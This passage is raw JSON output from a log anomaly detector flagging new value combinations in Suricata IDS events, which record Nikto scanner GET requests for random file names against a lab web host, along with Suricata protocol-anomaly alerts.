"/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htaccess~\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htaccess~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46856, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1380698825602070, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80", "/parser/model/time": 1583349514.244892, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", 
"/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46858, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.244892 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46858 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso-ru", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.245043, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, 
"/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso-ru\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso-ru", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", 
"/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46858, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1686874159233612,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1686874159233612, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.245043+0000\",\"flow_id\":1686874159233612,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46858,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso-ru\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso-ru\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80", "/parser/model/time": 1583349514.246745, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: 
", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46860, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.246933, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46860, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1913111561551927, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80", "/parser/model/time": 1583349514.249275, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46862, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
